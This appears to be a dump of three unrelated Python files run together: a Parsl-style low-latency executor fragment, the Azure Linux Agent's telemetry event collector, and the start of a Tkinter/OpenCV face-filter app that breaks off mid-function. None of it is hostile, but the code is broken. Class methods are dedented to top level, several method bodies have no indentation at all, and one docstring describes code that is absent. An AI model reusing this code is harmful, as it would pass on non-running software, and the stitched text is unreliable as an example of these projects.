        # {task_url} and {logdir} are filled in later by start().
        self.launch_cmd = """lowlatency_worker.py -n {workers_per_node} --task_url={task_url} --logdir={logdir}"""
def start(self):
    """Create the Interchange process and connect to it.

    Opens the task/result ZMQ pipes, starts the result-draining thread,
    launches the interchange process, and -- when a provider is
    configured -- submits the provider's initial blocks of workers.
    """
    self.outgoing_q = zmq_pipes.TasksOutgoing(
        "127.0.0.1", self.interchange_port_range)
    self.incoming_q = zmq_pipes.ResultsIncoming(
        "127.0.0.1", self.interchange_port_range)
    self.is_alive = True
    self._queue_management_thread = None
    self._start_queue_management_thread()
    self._start_local_queue_process()
    logger.debug("Created management thread: {}"
                 .format(self._queue_management_thread))
    if self.provider:
        # debug_opts = "--debug" if self.worker_debug else ""
        # Fill in the worker launch template now that the interchange's
        # worker-facing URL is known.
        l_cmd = self.launch_cmd.format(  # debug=debug_opts,
            task_url=self.worker_task_url,
            workers_per_node=self.workers_per_node,
            logdir="{}/{}".format(self.run_dir, self.label))
        self.launch_cmd = l_cmd
        logger.debug("Launch command: {}".format(self.launch_cmd))
        self._scaling_enabled = True
        logger.debug(
            "Starting LowLatencyExecutor with provider:\n%s", self.provider)
        if hasattr(self.provider, 'init_blocks'):
            try:
                for i in range(self.provider.init_blocks):
                    block = self.provider.submit(
                        self.launch_cmd, self.workers_per_node)
                    logger.debug("Launched block {}:{}".format(i, block))
                    if not block:
                        raise(ScalingFailed(self.provider.label,
                                            "Attempts to provision nodes via provider has failed"))
                    self.blocks.extend([block])
            except Exception as e:
                logger.error("Scaling out failed: {}".format(e))
                raise e
    else:
        # Without a provider, workers must be started externally.
        self._scaling_enabled = False
        logger.debug("Starting LowLatencyExecutor with no provider")
def _start_local_queue_process(self):
    """Start the interchange process and wait for its worker-facing port.

    Raises a generic Exception if the interchange does not report its
    port within 120 seconds.
    """
    comm_q = Queue(maxsize=10)
    self.queue_proc = Process(target=interchange.starter,
                              args=(comm_q,),
                              kwargs={"client_ports": (self.outgoing_q.port,
                                                       self.incoming_q.port),
                                      "worker_port": self.worker_port,
                                      "worker_port_range": self.worker_port_range
                                      # TODO: logdir and logging level
                                      })
    self.queue_proc.start()
    try:
        # The interchange reports back the port workers should connect to.
        worker_port = comm_q.get(block=True, timeout=120)
        logger.debug(
            "Got worker port {} from interchange".format(worker_port))
    except queue.Empty:
        logger.error(
            "Interchange has not completed initialization in 120s. Aborting")
        raise Exception("Interchange failed to start")
    # URL substituted into the worker launch command by start().
    self.worker_task_url = "tcp://{}:{}".format(
        self.address, worker_port)
def _start_queue_management_thread(self):
    """Launch the result-draining daemon thread; no-op if it already exists."""
    if self._queue_management_thread is not None:
        logger.debug("Management thread already exists, returning")
        return
    logger.debug("Starting queue management thread")
    thread = threading.Thread(target=self._queue_management_worker)
    # Daemonize so a lingering drain thread never blocks interpreter exit.
    thread.daemon = True
    self._queue_management_thread = thread
    thread.start()
    logger.debug("Started queue management thread")
def _queue_management_worker(self):
    """Drain the incoming result pipe and complete the matching Futures.

    Runs in a daemon thread until the executor enters a bad state or
    is_alive is cleared.
    """
    logger.debug("[MTHREAD] queue management worker starting")
    while not self.bad_state_is_set:
        task_id, buf = self.incoming_q.get()  # TODO: why does this hang?
        msg = deserialize_object(buf)[0]
        task_fut = self.tasks[task_id]
        logger.debug("Got response for task id {}".format(task_id))
        if "result" in msg:
            task_fut.set_result(msg["result"])
        elif "exception" in msg:
            # BUG FIX: this branch used to be shadowed by a duplicate
            # `elif "exception" in msg: pass` stub, so remote exceptions
            # were silently dropped and the future never completed.
            # Also supply the missing format argument to the log message.
            logger.warning("Task: {} has returned with an exception".format(task_id))
            try:
                s, _ = deserialize_object(msg['exception'])
                exception = ValueError("Remote exception description: {}".format(s))
                task_fut.set_exception(exception)
            except Exception as e:
                # TODO could be a proper wrapped exception?
                task_fut.set_exception(
                    DeserializationError("Received exception, but handling also threw an exception: {}".format(e)))
        else:
            raise BadMessage(
                "Message received is neither result nor exception")
        if not self.is_alive:
            break
    logger.info("[MTHREAD] queue management worker finished")
def submit(self, func, resource_specification, *args, **kwargs):
    """Serialize a function call, queue it for execution, and return its Future.

    :raises UnsupportedFeatureError: if a resource specification is given.
    """
    if resource_specification:
        logger.error("Ignoring the resource specification. "
                     "Parsl resource specification is not supported in LowLatency Executor. "
                     "Please check WorkQueueExecutor if resource specification is needed.")
        raise UnsupportedFeatureError('resource specification', 'LowLatency Executor', 'WorkQueue Executor')
    if self.bad_state_is_set:
        raise self.executor_exception
    self._task_counter += 1
    task_id = self._task_counter
    logger.debug(
        "Pushing function {} to queue with args {}".format(func, args))
    future = Future()
    self.tasks[task_id] = future
    payload = pack_apply_message(func, args, kwargs,
                                 buffer_threshold=1024 * 1024,
                                 item_threshold=1024)
    # Hand the serialized call to the interchange via the outgoing pipe.
    self.outgoing_q.put(task_id, payload)
    return future
@property
def scaling_enabled(self):
    """True when a provider is available for scaling (set in start())."""
    return self._scaling_enabled
def scale_out(self, blocks=1):
    """Scales out the number of active workers by the number of blocks specified.

    Parameters
    ----------
    blocks : int
        # of blocks to scale out. Default=1

    Raises:
        ScalingFailed: if the provider fails to launch a block.
    """
    # NOTE(review): `r` is never appended to, so this returns [] on success
    # and None when no provider is configured -- confirm callers expect that.
    r = []
    for i in range(blocks):
        if self.provider:
            block = self.provider.submit(
                self.launch_cmd, self.workers_per_node)
            logger.debug("Launched block {}:{}".format(i, block))
            if not block:
                raise(ScalingFailed(self.provider.label,
                                    "Attempts to provision nodes via provider has failed"))
            self.blocks.extend([block])
        else:
            logger.error("No execution provider available")
            r = None
    return r
def scale_in(self, blocks):
    """Scale in the number of active blocks by specified amount.

    The scale in method here is very rude. It doesn't give the workers
    the opportunity to finish current tasks or cleanup. This is tracked
    in issue #530

    :param blocks: number of blocks (oldest first) to cancel.
    :return: IDs that were successfully scaled in.
    """
    to_kill = self.blocks[:blocks]
    # NOTE(review): when self.provider is falsy, `r` is never bound and the
    # return below raises NameError -- confirm a provider is always present.
    if self.provider:
        r = self.provider.cancel(to_kill)
    return self._filter_scale_in_ids(to_kill, r)
def _get_job_ids(self):
    """Return the provider job IDs of the blocks launched so far."""
    return self.blocks
def shutdown(self, hub=True, targets='all', block=False):
    """Shutdown the executor.

    Currently only terminates the interchange process; the keyword
    arguments are accepted for interface compatibility but are ignored,
    and worker blocks are not cancelled.

    Kwargs:
        - hub (Bool): Whether the hub should be shutdown, Default:True,
        - targets (list of ints| 'all'): List of block id's to kill, Default:'all'
        - block (Bool): To block for confirmations or not
    """
    logger.warning("Attempting LowLatencyExecutor shutdown")
    # self.outgoing_q.close()
    # self.incoming_q.close()
    self.queue_proc.terminate()
    logger.warning("Finished LowLatencyExecutor shutdown attempt")
    return True
|
collect_telemetry_events.py | # Microsoft Azure Linux Agent
#
# Copyright 2020 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import datetime
import json
import os
import re
import threading
import traceback
from collections import defaultdict
import azurelinuxagent.common.logger as logger
from azurelinuxagent.common import conf
from azurelinuxagent.common.agent_supported_feature import get_supported_feature_by_name, SupportedFeatureNames
from azurelinuxagent.common.event import EVENTS_DIRECTORY, TELEMETRY_LOG_EVENT_ID, \
TELEMETRY_LOG_PROVIDER_ID, add_event, WALAEventOperation, add_log_event, get_event_logger, \
CollectOrReportEventDebugInfo, EVENT_FILE_REGEX, parse_event
from azurelinuxagent.common.exception import InvalidExtensionEventError, ServiceStoppedError
from azurelinuxagent.common.future import ustr
from azurelinuxagent.common.interfaces import ThreadHandlerInterface
from azurelinuxagent.common.telemetryevent import TelemetryEvent, TelemetryEventParam, \
GuestAgentGenericLogsSchema, GuestAgentExtensionEventsSchema
from azurelinuxagent.ga.exthandlers import HANDLER_NAME_PATTERN
from azurelinuxagent.ga.periodic_operation import PeriodicOperation
def get_collect_telemetry_events_handler(send_telemetry_events_handler):
    """Factory for the telemetry-events collector thread handler."""
    return CollectTelemetryEventsHandler(send_telemetry_events_handler)
class ExtensionEventSchema(object):
    """
    Class for defining the schema for Extension Events.

    Note: _ProcessExtensionEvents derives its required-field list from the
    lower-cased attribute names below, so every attribute here is a
    mandatory field of a parsed extension event.

    Sample Extension Event Example:
        {
            "Version":"1.0.0.23",
            "Timestamp":"2018-01-02T22:08:12.510696Z" //(time in UTC (ISO-8601 standard),
            "TaskName":"TestRun" //Open for publishers,
            "EventLevel":"Critical/Error/Warning/Verbose/Informational/LogAlways",
            "Message": "Successful test" //(max 3K, 3072 characters),
            "EventPid":"1",
            "EventTid":"2",
            "OperationId":"Guid (str)"
        }
    """
    Version = "Version"
    Timestamp = "Timestamp"
    TaskName = "TaskName"
    EventLevel = "EventLevel"
    Message = "Message"
    EventPid = "EventPid"
    EventTid = "EventTid"
    OperationId = "OperationId"
class _ProcessExtensionEvents(PeriodicOperation):
    """
    Periodic operation for collecting extension telemetry events and enqueueing them for the SendTelemetryHandler thread.
    """
    _EXTENSION_EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=5)
    # Event files must be named <integer>.json (case-insensitive extension).
    _EXTENSION_EVENT_FILE_NAME_REGEX = re.compile(r"^(\d+)\.json$", re.IGNORECASE)
    # Limits
    _MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD = 300
    _EXTENSION_EVENT_FILE_MAX_SIZE = 4 * 1024 * 1024  # 4 MB = 4 * 1,048,576 Bytes
    _EXTENSION_EVENT_MAX_SIZE = 1024 * 6  # 6Kb or 6144 characters. Limit for the whole event. Prevent oversized events.
    _EXTENSION_EVENT_MAX_MSG_LEN = 1024 * 3  # 3Kb or 3072 chars.
    # Lower-cased attribute names of ExtensionEventSchema; each one is a
    # required key of every parsed extension event.
    _EXTENSION_EVENT_REQUIRED_FIELDS = [attr.lower() for attr in dir(ExtensionEventSchema) if
                                        not callable(getattr(ExtensionEventSchema, attr)) and not attr.startswith("__")]

    def __init__(self, send_telemetry_events_handler):
        super(_ProcessExtensionEvents, self).__init__(_ProcessExtensionEvents._EXTENSION_EVENT_COLLECTION_PERIOD)
        # Handler thread that actually transmits events; we only enqueue.
        self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
    """Collect event files from every handler's events directory and
    enqueue them; event directories are emptied afterwards unless the
    telemetry service stopped mid-run."""
    if self._send_telemetry_events_handler.stopped():
        logger.warn("{0} service is not running, skipping current iteration".format(
            self._send_telemetry_events_handler.get_thread_name()))
        return
    delete_all_event_files = True
    extension_handler_with_event_dirs = []
    try:
        extension_handler_with_event_dirs = self._get_extension_events_dir_with_handler_name(conf.get_ext_log_dir())
        if not extension_handler_with_event_dirs:
            logger.verbose("No Extension events directory exist")
            return
        for extension_handler_with_event_dir in extension_handler_with_event_dirs:
            handler_name = extension_handler_with_event_dir[0]
            handler_event_dir_path = extension_handler_with_event_dir[1]
            self._capture_extension_events(handler_name, handler_event_dir_path)
    except ServiceStoppedError:
        # Since the service stopped, we should not delete the extension files and retry sending them whenever
        # the telemetry service comes back up
        delete_all_event_files = False
    except Exception as error:
        msg = "Unknown error occurred when trying to collect extension events. Error: {0}, Stack: {1}".format(
            ustr(error), traceback.format_exc())
        add_event(op=WALAEventOperation.ExtensionTelemetryEventProcessing, message=msg, is_success=False)
    finally:
        # Always ensure that the events directory are being deleted each run except when Telemetry Service is stopped,
        # even if we run into an error and dont process them this run.
        if delete_all_event_files:
            self._ensure_all_events_directories_empty(extension_handler_with_event_dirs)
@staticmethod
def _get_extension_events_dir_with_handler_name(extension_log_dir):
    """
    Get the full path to events directory for all extension handlers that have one
    :param extension_log_dir: Base log directory for all extensions
    :return: A list of full paths of existing events directory for all handlers
    """
    handlers_with_events = []
    for entry in os.listdir(extension_log_dir):
        entry_path = os.path.join(extension_log_dir, entry)
        # Only directories whose names match the handler pattern qualify.
        if not os.path.isdir(entry_path) or re.match(HANDLER_NAME_PATTERN, entry) is None:
            continue
        # Collect the handler only when its EVENTS_DIRECTORY exists.
        events_dir = os.path.join(entry_path, EVENTS_DIRECTORY)
        if os.path.exists(events_dir):
            handlers_with_events.append((entry, events_dir))
    return handlers_with_events
def _event_file_size_allowed(self, event_file_path):
    """Return True when the event file is within the per-file size cap;
    otherwise log/report the oversize file and return False."""
    size_in_bytes = os.stat(event_file_path).st_size
    if size_in_bytes <= self._EXTENSION_EVENT_FILE_MAX_SIZE:
        return True
    to_mb = lambda x: (1.0 * x) / (1000 * 1000)
    msg = "Skipping file: {0} as its size is {1:.2f} Mb > Max size allowed {2:.1f} Mb".format(
        event_file_path, to_mb(size_in_bytes),
        to_mb(self._EXTENSION_EVENT_FILE_MAX_SIZE))
    logger.warn(msg)
    add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
    return False
def _capture_extension_events(self, handler_name, handler_event_dir_path):
    """
    Capture Extension events and add them to the events_list
    :param handler_name: Complete Handler Name. Eg: Microsoft.CPlat.Core.RunCommandLinux
    :param handler_event_dir_path: Full path. Eg: '/var/log/azure/Microsoft.CPlat.Core.RunCommandLinux/events'
    """
    # Filter out the files that do not follow the pre-defined EXTENSION_EVENT_FILE_NAME_REGEX
    event_files = [event_file for event_file in os.listdir(handler_event_dir_path) if
                   re.match(self._EXTENSION_EVENT_FILE_NAME_REGEX, event_file) is not None]
    # Pick the latest files first, we'll discard older events if len(events) > MAX_EVENT_COUNT
    event_files.sort(reverse=True)
    captured_extension_events_count = 0
    # Maps parse-error message -> number of events dropped for that reason.
    dropped_events_with_error_count = defaultdict(int)
    try:
        for event_file in event_files:
            event_file_path = os.path.join(handler_event_dir_path, event_file)
            try:
                logger.verbose("Processing event file: {0}", event_file_path)
                # Oversized files are skipped (and still deleted in finally).
                if not self._event_file_size_allowed(event_file_path):
                    continue
                # We support multiple events in a file, read the file and parse events.
                captured_extension_events_count = self._enqueue_events_and_get_count(handler_name, event_file_path,
                                                                                    captured_extension_events_count,
                                                                                    dropped_events_with_error_count)
                # We only allow MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD=300 maximum events per period per handler
                if captured_extension_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
                    msg = "Reached max count for the extension: {0}; Max Limit: {1}. Skipping the rest.".format(
                        handler_name, self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD)
                    logger.warn(msg)
                    add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
                    break
            except ServiceStoppedError:
                # Not logging here as already logged once, re-raising
                # Since we already started processing this file, deleting it as we could've already sent some events out
                # This is a trade-off between data replication vs data loss.
                raise
            except Exception as error:
                msg = "Failed to process event file {0}: {1}, {2}".format(event_file, ustr(error),
                                                                          traceback.format_exc())
                logger.warn(msg)
                add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
            finally:
                # Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
                # from our end rather than deleting first and sending later. This is to ensure the data reliability
                # of the agent telemetry pipeline.
                os.remove(event_file_path)
    finally:
        # Emit one summary per handler per run instead of per-event noise.
        if dropped_events_with_error_count:
            msg = "Dropped events for Extension: {0}; Details:\n\t{1}".format(handler_name, '\n\t'.join(
                ["Reason: {0}; Dropped Count: {1}".format(k, v) for k, v in dropped_events_with_error_count.items()]))
            logger.warn(msg)
            add_log_event(level=logger.LogLevel.WARNING, message=msg, forced=True)
        if captured_extension_events_count > 0:
            logger.info("Collected {0} events for extension: {1}".format(captured_extension_events_count, handler_name))
@staticmethod
def _ensure_all_events_directories_empty(extension_events_directories):
    """Delete residue event files from each handler's events directory.

    :param extension_events_directories: iterable of
        (handler_name, events_dir_path) tuples.
    """
    if not extension_events_directories:
        return
    for extension_handler_with_event_dir in extension_events_directories:
        event_dir_path = extension_handler_with_event_dir[1]
        # BUG FIX: this used to `return`, so one missing directory aborted
        # the cleanup of every remaining handler; skip just this entry.
        if not os.path.exists(event_dir_path):
            continue
        log_err = True
        # Delete any residue files in the events directory
        for residue_file in os.listdir(event_dir_path):
            try:
                os.remove(os.path.join(event_dir_path, residue_file))
            except Exception as error:
                # Only log the first error once per handler per run to keep the logfile clean
                if log_err:
                    logger.error("Failed to completely clear the {0} directory. Exception: {1}", event_dir_path,
                                 ustr(error))
                    log_err = False
def _enqueue_events_and_get_count(self, handler_name, event_file_path, captured_events_count,
                                  dropped_events_with_error_count):
    """Parse every event in the file, enqueue the valid ones, and return
    the updated running count of captured events for this handler.

    Mutates dropped_events_with_error_count in place (error msg -> count).
    Raises ServiceStoppedError if the send handler has stopped.
    """
    # The file's mtime serves as the events' creation time.
    event_file_time = datetime.datetime.fromtimestamp(os.path.getmtime(event_file_path))
    # Read event file and decode it properly
    with open(event_file_path, "rb") as event_file_descriptor:
        event_data = event_file_descriptor.read().decode("utf-8")
    # Parse the string and get the list of events
    events = json.loads(event_data)
    # We allow multiple events in a file but there can be an instance where the file only has a single
    # JSON event and not a list. Handling that condition too
    if not isinstance(events, list):
        events = [events]
    for event in events:
        try:
            self._send_telemetry_events_handler.enqueue_event(
                self._parse_telemetry_event(handler_name, event, event_file_time)
            )
            captured_events_count += 1
        except InvalidExtensionEventError as invalid_error:
            # These are the errors thrown if there's an error parsing the event. We want to report these back to the
            # extension publishers so that they are aware of the issues.
            # The error messages are all static messages, we will use this to create a dict and emit an event at the
            # end of each run to notify if there were any errors parsing events for the extension
            dropped_events_with_error_count[ustr(invalid_error)] += 1
        except ServiceStoppedError as stopped_error:
            logger.error(
                "Unable to enqueue events as service stopped: {0}. Stopping collecting extension events".format(
                    ustr(stopped_error)))
            raise
        except Exception as error:
            logger.warn("Unable to parse and transmit event, error: {0}".format(error))
        # Stop early once the per-handler per-period cap is reached.
        if captured_events_count >= self._MAX_NUMBER_OF_EVENTS_PER_EXTENSION_PER_PERIOD:
            break
    return captured_events_count
def _parse_telemetry_event(self, handler_name, extension_unparsed_event, event_file_time):
    """
    Parse the Json event file and convert it to TelemetryEvent object with the required data.
    :return: Complete TelemetryEvent with all required fields filled up properly. Raises if event breaches contract.
    """
    extension_event = self._parse_event_and_ensure_it_is_valid(extension_unparsed_event)
    # Create a telemetry event, add all common parameters to the event
    # and then overwrite all the common params with extension events params if same
    event = TelemetryEvent(TELEMETRY_LOG_EVENT_ID, TELEMETRY_LOG_PROVIDER_ID)
    event.file_type = "json"
    CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event, event_file_time)
    # Map the extension-supplied fields onto the generic-logs schema columns.
    replace_or_add_params = {
        GuestAgentGenericLogsSchema.EventName: "{0}-{1}".format(handler_name, extension_event[
            ExtensionEventSchema.Version.lower()]),
        GuestAgentGenericLogsSchema.CapabilityUsed: extension_event[ExtensionEventSchema.EventLevel.lower()],
        GuestAgentGenericLogsSchema.TaskName: extension_event[ExtensionEventSchema.TaskName.lower()],
        GuestAgentGenericLogsSchema.Context1: extension_event[ExtensionEventSchema.Message.lower()],
        GuestAgentGenericLogsSchema.Context2: extension_event[ExtensionEventSchema.Timestamp.lower()],
        GuestAgentGenericLogsSchema.Context3: extension_event[ExtensionEventSchema.OperationId.lower()],
        GuestAgentGenericLogsSchema.EventPid: extension_event[ExtensionEventSchema.EventPid.lower()],
        GuestAgentGenericLogsSchema.EventTid: extension_event[ExtensionEventSchema.EventTid.lower()]
    }
    self._replace_or_add_param_in_event(event, replace_or_add_params)
    return event
def _parse_event_and_ensure_it_is_valid(self, extension_event):
    """
    Parse the Json event from file. Raise InvalidExtensionEventError if the event breaches pre-set contract.
    :param extension_event: The json event from file
    :return: Verified Json event that qualifies the contract.
    """
    clean_string = lambda x: x.strip() if x is not None else x
    event_size = 0
    key_err_msg = "{0}: {1} not found"
    # Convert the dict to all lower keys to avoid schema confusion.
    # Only pick the params that we care about and skip the rest.
    event = dict((k.lower(), clean_string(v)) for k, v in extension_event.items() if
                 k.lower() in self._EXTENSION_EVENT_REQUIRED_FIELDS)
    # Trim message and only pick the first 3k chars
    message_key = ExtensionEventSchema.Message.lower()
    if message_key in event:
        event[message_key] = event[message_key][:self._EXTENSION_EVENT_MAX_MSG_LEN]
    else:
        raise InvalidExtensionEventError(
            key_err_msg.format(InvalidExtensionEventError.MissingKeyError, ExtensionEventSchema.Message))
    if not event[message_key]:
        raise InvalidExtensionEventError(
            "{0}: {1} should not be empty".format(InvalidExtensionEventError.EmptyMessageError,
                                                  ExtensionEventSchema.Message))
    for required_key in self._EXTENSION_EVENT_REQUIRED_FIELDS:
        # If all required keys not in event then raise
        if required_key not in event:
            raise InvalidExtensionEventError(
                key_err_msg.format(InvalidExtensionEventError.MissingKeyError, required_key))
        # If the event_size > _EXTENSION_EVENT_MAX_SIZE=6k, then raise
        # NOTE(review): the size check runs before the current field's length
        # is accumulated, so the final field is never counted against the
        # limit -- confirm this off-by-one is intended.
        if event_size > self._EXTENSION_EVENT_MAX_SIZE:
            raise InvalidExtensionEventError(
                "{0}: max event size allowed: {1}".format(InvalidExtensionEventError.OversizeEventError,
                                                          self._EXTENSION_EVENT_MAX_SIZE))
        # NOTE(review): len() assumes the value is a string; a numeric JSON
        # value here would raise TypeError -- verify inputs upstream.
        event_size += len(event[required_key])
    return event
@staticmethod
def _replace_or_add_param_in_event(event, replace_or_add_params):
    """Overwrite matching event parameters in place; append any leftovers
    to the event as new parameters."""
    pending = replace_or_add_params
    for param in event.parameters:
        if param.name in pending:
            param.value = pending.pop(param.name)
    # Whatever wasn't matched above is new to this event; append it.
    for param_name in pending:
        event.parameters.append(TelemetryEventParam(param_name, pending[param_name]))
class _CollectAndEnqueueEvents(PeriodicOperation):
    """
    Periodic operation to collect telemetry events located in the events folder and enqueue them for the
    SendTelemetryHandler thread.
    """
    # Agent events are collected every minute (extension events use a
    # separate 5-minute period in _ProcessExtensionEvents).
    _EVENT_COLLECTION_PERIOD = datetime.timedelta(minutes=1)

    def __init__(self, send_telemetry_events_handler):
        super(_CollectAndEnqueueEvents, self).__init__(_CollectAndEnqueueEvents._EVENT_COLLECTION_PERIOD)
        # Handler thread that actually transmits events; we only enqueue.
        self._send_telemetry_events_handler = send_telemetry_events_handler
def _operation(self):
    """
    Periodically send any events located in the events folder
    """
    try:
        if self._send_telemetry_events_handler.stopped():
            # The transmitting service is down; try again next period.
            logger.warn("{0} service is not running, skipping iteration.".format(
                self._send_telemetry_events_handler.get_thread_name()))
        else:
            self.process_events()
    except Exception as error:
        err_msg = "Failure in collecting telemetry events: {0}".format(ustr(error))
        add_event(op=WALAEventOperation.UnhandledError, message=err_msg, is_success=False)
def process_events(self):
    """
    Returns a list of events that need to be sent to the telemetry pipeline and deletes the corresponding files
    from the events directory.
    """
    event_directory_full_path = os.path.join(conf.get_lib_dir(), EVENTS_DIRECTORY)
    event_files = os.listdir(event_directory_full_path)
    debug_info = CollectOrReportEventDebugInfo(operation=CollectOrReportEventDebugInfo.OP_COLLECT)
    for event_file in event_files:
        try:
            # Only files matching the agent's event-file naming pattern count.
            match = EVENT_FILE_REGEX.search(event_file)
            if match is None:
                continue
            event_file_path = os.path.join(event_directory_full_path, event_file)
            try:
                logger.verbose("Processing event file: {0}", event_file_path)
                with open(event_file_path, "rb") as event_fd:
                    event_data = event_fd.read().decode("utf-8")
                event = parse_event(event_data)
                # "legacy" events are events produced by previous versions of the agent (<= 2.2.46) and extensions;
                # they do not include all the telemetry fields, so we add them here
                is_legacy_event = match.group('agent_event') is None
                if is_legacy_event:
                    # We'll use the file creation time for the event's timestamp
                    event_file_creation_time_epoch = os.path.getmtime(event_file_path)
                    event_file_creation_time = datetime.datetime.fromtimestamp(event_file_creation_time_epoch)
                    if event.is_extension_event():
                        _CollectAndEnqueueEvents._trim_legacy_extension_event_parameters(event)
                        CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(event,
                                                                                           event_file_creation_time)
                    else:
                        _CollectAndEnqueueEvents._update_legacy_agent_event(event,
                                                                            event_file_creation_time)
                self._send_telemetry_events_handler.enqueue_event(event)
            finally:
                # Todo: We should delete files after ensuring that we sent the data to Wireserver successfully
                # from our end rather than deleting first and sending later. This is to ensure the data reliability
                # of the agent telemetry pipeline.
                os.remove(event_file_path)
        except ServiceStoppedError as stopped_error:
            logger.error(
                "Unable to enqueue events as service stopped: {0}, skipping events collection".format(
                    ustr(stopped_error)))
        except UnicodeError as uni_err:
            debug_info.update_unicode_error(uni_err)
        except Exception as error:
            debug_info.update_op_error(error)
    # Emit a single summary covering all errors encountered this run.
    debug_info.report_debug_info()
@staticmethod
def _update_legacy_agent_event(event, event_creation_time):
    # Ensure that if an agent event is missing a field from the schema defined since 2.2.47, the missing fields
    # will be appended, ensuring the event schema is complete before the event is reported.
    reference_event = TelemetryEvent()
    reference_event.parameters = []
    CollectTelemetryEventsHandler.add_common_params_to_telemetry_event(reference_event, event_creation_time)
    existing_names = set(param.name for param in event.parameters)
    reference_values = dict((param.name, param.value) for param in reference_event.parameters)
    # Append only the schema parameters the legacy event lacks.
    for param_name in reference_values:
        if param_name not in existing_names:
            event.parameters.append(TelemetryEventParam(param_name, reference_values[param_name]))
@staticmethod
def _trim_legacy_extension_event_parameters(event):
    """
    This method is called for extension events before they are sent out. Per the agreement with extension
    publishers, the parameters that belong to extensions and will be reported intact are Name, Version, Operation,
    OperationSuccess, Message, and Duration. Since there is nothing preventing extensions to instantiate other
    fields (which belong to the agent), we call this method to ensure the rest of the parameters are trimmed since
    they will be replaced with values coming from the agent.
    :param event: Extension event to trim.
    :return: Trimmed extension event; containing only extension-specific parameters.
    """
    extension_owned_names = frozenset([
        GuestAgentExtensionEventsSchema.Name,
        GuestAgentExtensionEventsSchema.Version,
        GuestAgentExtensionEventsSchema.Operation,
        GuestAgentExtensionEventsSchema.OperationSuccess,
        GuestAgentExtensionEventsSchema.Message,
        GuestAgentExtensionEventsSchema.Duration
    ])
    # Keep only extension-owned parameters; agent-owned ones are re-added later.
    event.parameters = [param for param in event.parameters if param.name in extension_owned_names]
class CollectTelemetryEventsHandler(ThreadHandlerInterface):
    """
    This Handler takes care of fetching the Extension Telemetry events from the {extension_events_dir} and sends it to
    Kusto for advanced debuggability.
    """
    _THREAD_NAME = "TelemetryEventsCollector"

    def __init__(self, send_telemetry_events_handler):
        # Flag read by stopped(); cleared by stop() to end the daemon loop.
        self.should_run = True
        self.thread = None
        # Handler thread that transmits the events we collect and enqueue.
        self._send_telemetry_events_handler = send_telemetry_events_handler

    @staticmethod
    def get_thread_name():
        return CollectTelemetryEventsHandler._THREAD_NAME
def run(self):
logger.info("Start Extension Telemetry service.")
self.start()
def is_alive(self):
return self.thread is not None and self.thread.is_alive()
def start(self):
self.thread = threading.Thread(target=self.daemon)
self.thread.setDaemon(True)
self.thread.setName(CollectTelemetryEventsHandler.get_thread_name())
self.thread.start()
def stop(self):
"""
Stop server communication and join the thread to main thread.
"""
self.should_run = False
if self.is_alive():
self.thread.join()
def stopped(self):
return not self.should_run
def daemon(self):
periodic_operations = [
_CollectAndEnqueueEvents(self._send_telemetry_events_handler)
]
is_etp_enabled = get_supported_feature_by_name(SupportedFeatureNames.ExtensionTelemetryPipeline).is_supported
logger.info("Extension Telemetry pipeline enabled: {0}".format(is_etp_enabled))
if is_etp_enabled:
periodic_operations.append(_ProcessExtensionEvents(self._send_telemetry_events_handler))
logger.info("Successfully started the {0} thread".format(self.get_thread_name()))
while not self.stopped():
try:
for periodic_op in periodic_operations:
periodic_op.run()
except Exception as error:
logger.warn(
"An error occurred in the Telemetry Extension thread main loop; will skip the current iteration.\n{0}",
ustr(error))
finally:
PeriodicOperation.sleep_until_next_operation(periodic_operations)
@staticmethod
def add_common_params_to_telemetry_event(event, event_time):
reporter = get_event_logger()
reporter.add_common_event_parameters(event, event_time) |
Filterastic.py | # Libraries
from Tkinter import *
from PIL import Image
from PIL import ImageTk
import cv2, threading, os, time
from threading import Thread
previous=0
smile=0
def get_sprite(num):
    """Toggle filter slot `num` between enabled (1) and disabled (0)."""
    global SPRITES
    SPRITES[num] = 0 if SPRITES[num] else 1
def smile_Detection(current):
    """Advance the smile-driven filter cycle on a smile "falling edge".

    `current` is 1 when a smile is visible in the frame, 0 otherwise.  When a
    smile just ended (current 0 after previous 1), the next filter slot in
    SPRITES is switched on and the one before it switched off, so each
    completed smile steps through the filter list.
    """
    global previous
    global smile
    global SPRITES
    if(current==0 and previous==1):
        # Falling edge: one complete smile observed.
        smile=smile+1
        if smile==16:
            # Wrap around after the last filter slot.
            # NOTE(review): after this reset smile-1 == -1, so the next line
            # sets SPRITES[-1] (the Smile I/O toggle itself, index 16).  That
            # looks unintended — confirm the wrap-around behaviour.
            smile=0
        SPRITES[smile-1]= 1
        if smile>1:
            # Turn off the previously-activated filter.
            SPRITES[smile-2]= 0
    previous=current
# Applying filter
def transparentOverlay(src, overlay, pos=(0, 0), scale=1):
    """Alpha-blend a BGRA `overlay` onto BGR `src` in place, clipped to bounds.

    :param src: destination image (numpy uint8 array, shape (rows, cols, 3));
        modified in place.
    :param overlay: BGRA image whose 4th channel is the alpha mask.
    :param pos: (row, col) offset of the overlay's top-left corner; assumes
        non-negative components (every caller in this file uses the default).
    :param scale: uniform resize factor applied to the overlay first.
    :return: `src`, for convenience.

    Replaces the original per-pixel Python loop with a single vectorized
    slice assignment (same pixels written, same truncating uint8 cast), which
    is essential for real-time video.
    """
    overlay = cv2.resize(overlay, (0, 0), fx=scale, fy=scale)
    h, w, _ = overlay.shape
    rows, cols, _ = src.shape
    y, x = pos[0], pos[1]
